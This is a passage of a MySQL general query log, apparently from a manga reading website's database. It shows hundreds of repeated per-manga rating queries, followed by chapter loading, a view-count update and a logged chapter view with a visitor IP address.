= '187' order by created desc 330657635 Quit 330657636 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657636 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330657636 Quit 330657637 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657637 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330657637 Quit 330657638 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657638 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330657638 Quit 330657639 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657639 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330657639 Quit 330657640 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657640 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330657640 Quit 330657641 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657641 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330657641 Quit 330657642 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657642 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330657642 Quit 330657643 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657643 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330657643 Quit 330657644 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657644 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330657644 Quit 330657645 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657645 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330657645 Quit 330657646 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657646 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330657646 Quit 330657647 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657647 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330657647 Quit 330657648 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657648 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330657648 Quit 330657649 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657649 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330657649 Quit 330657650 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657650 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330657650 Quit 330657651 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657651 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330657651 Quit 330657652 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657652 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330657652 Quit 330657653 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657653 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330657653 Quit 330657654 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657654 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330657654 Quit 330657655 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657655 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330657655 Quit 330657656 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657656 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330657656 Quit 330657657 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657657 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330657657 Quit 330657658 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657658 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330657658 Quit 330657659 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657659 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330657659 Quit 330657660 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657660 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330657660 Quit 330657661 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657661 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330657661 Quit 330657662 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657662 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330657662 Quit 330657663 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657663 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330657663 Quit 330657664 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657664 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330657664 Quit 330657665 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657665 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330657665 Quit 330657666 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657666 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330657666 Quit 330657667 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657667 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330657667 Quit 330657668 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657668 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330657668 Quit 330657669 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657669 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330657669 Quit 330657670 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657670 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330657670 Quit 330657671 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657671 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330657671 Quit 330657672 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657672 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330657672 Quit 330657673 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657673 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330657673 Quit 330657674 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657674 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330657674 Quit 330657675 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657675 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330657675 Quit 330657676 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657676 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330657676 Quit 330657677 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657677 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330657677 Quit 330657678 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657678 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330657678 Quit 330657679 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657679 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330657679 Quit 330657680 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657680 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330657680 Quit 330657681 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657681 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330657681 Quit 330657682 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657682 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330657682 Quit 330657683 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657683 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330657683 Quit 330657684 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657684 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330657684 Quit 330657685 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657685 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330657685 Quit 330657686 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657686 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330657686 Quit 330657687 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657687 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330657687 Quit 330657688 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657688 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330657688 Quit 330657689 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657689 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330657689 Quit 330657690 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657690 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330657690 Quit 330657691 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657691 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330657691 Quit 330657692 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657692 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330657692 Quit 330657693 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657693 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330657693 Quit 330657694 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657694 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330657694 Quit 330657695 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657695 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330657695 Quit 330657696 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657696 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330657696 Quit 330657697 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657697 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330657697 Quit 330657698 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657698 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330657698 Quit 330657699 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657699 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330657699 Quit 330657700 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657700 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330657700 Quit 330657701 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657701 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330657701 Quit 330657702 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657702 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330657702 Quit 330657703 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657703 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330657703 Quit 330657704 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657704 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330657704 Quit 330657705 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657705 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330657705 Quit 330657706 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657706 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330657706 Quit 330657707 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657707 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330657707 Quit 330657708 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657708 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330657708 Quit 330657709 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657709 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330657709 Quit 330657710 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657710 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330657710 Quit 330657711 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657711 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330657711 Quit 330657712 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657712 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330657712 Quit 330657713 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657713 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330657713 Quit 330657714 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657714 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330657714 Quit 330657715 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657715 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330657715 Quit 330657716 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657716 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330657716 Quit 330657717 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657717 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330657717 Quit 330657718 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657718 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330657718 Quit 330657719 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657719 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330657719 Quit 330657720 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657720 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330657720 Quit 330657721 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657721 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330657721 Quit 330657722 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657722 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330657722 Quit 330657723 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657723 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330657723 Quit 330657724 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657724 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330657724 Quit 330657725 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657725 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330657725 Quit 330657726 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657726 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330657726 Quit 330657727 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657727 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330657727 Quit 330657728 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657728 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330657728 Quit 330657729 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657729 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330657729 Quit 330657730 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657730 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330657730 Quit 330657731 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657731 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330657731 Quit 330657732 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657732 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330657732 Quit 330657733 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657733 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330657733 Quit 330657734 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657734 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330657734 Quit 330657735 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657735 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330657735 Quit 330657736 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657736 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330657736 Quit 330657737 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657737 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330657737 Quit 330657738 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657738 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330657738 Quit 330657739 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657739 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330657739 Quit 330657740 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657740 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330657740 Quit 330657741 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657741 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330657741 Quit 330657742 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657742 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330657742 Quit 330657743 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657743 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330657743 Quit 330657744 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657744 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330657744 Quit 330657745 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657745 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330657745 Quit 330657746 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657746 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330657746 Quit 330657747 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657747 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330657747 Quit 330657748 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657748 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330657748 Quit 330657749 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657749 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330657749 Quit 330657750 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657750 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330657750 Quit 330657751 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657751 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330657751 Quit 330657752 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657752 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330657752 Quit 330657753 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657753 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330657753 Quit 330657754 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657754 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330657754 Quit 330657755 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657755 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330657755 Quit 330657756 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657756 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330657756 Quit 330657757 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657757 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330657757 Quit 330657758 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657758 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330657758 Quit 330657759 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657759 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330657759 Quit 330657760 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657760 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330657760 Quit 330657761 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657761 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330657761 Quit 330657762 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657762 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330657762 Quit 330657763 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657763 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330657763 Quit 330657764 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657764 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330657764 Quit 330657765 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657765 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330657765 Quit 330657766 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657766 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330657766 Quit 330657767 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 260225 19:29:49 330657767 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330657767 Quit 330657768 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657768 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330657768 Quit 330657769 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657769 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330657769 Quit 330657770 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657770 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330657770 Quit 330657771 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657771 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330657771 Quit 330657772 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657772 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330657772 Quit 330657773 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657773 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330657773 Quit 330657774 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657774 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330657774 Quit 330657775 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657775 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330657775 Quit 330657776 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657776 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330657776 Quit 330657777 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657777 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330657777 Quit 330657778 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657779 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657778 Quit 330657779 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12512' 330657779 Quit 330657780 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657780 Query select * FROM chapters where id = '12512' 330657780 Quit 330657781 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657781 Query select * FROM chapters where manga_id = '239' order by id desc 330657781 Quit 330657782 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657782 Query Update chapters set view=view+1 where id = '12512' 330657782 Quit 330657783 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657783 Query select * FROM chapters where id = '12512' 330657784 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657783 Quit 330657784 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12512' 330657784 Quit 330657785 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657785 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('239', '12512', '1.47.26.109', 'mangacherri.com', '2026-02-26 03:29:49', '2026-02-26 03:29:49') 330657785 Quit 330657786 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657786 Query select * FROM chapter_images where chapter_id = '12512' 330657786 Quit 330657787 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657787 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '239' and m.active = 1 330657787 Quit 330657788 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330657788 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='239' and m.active = 1 AND (genres like '%Animals%' OR genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shounen%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330657789 Connect mangauser@localhost on u317079482_mangacherri_2 using 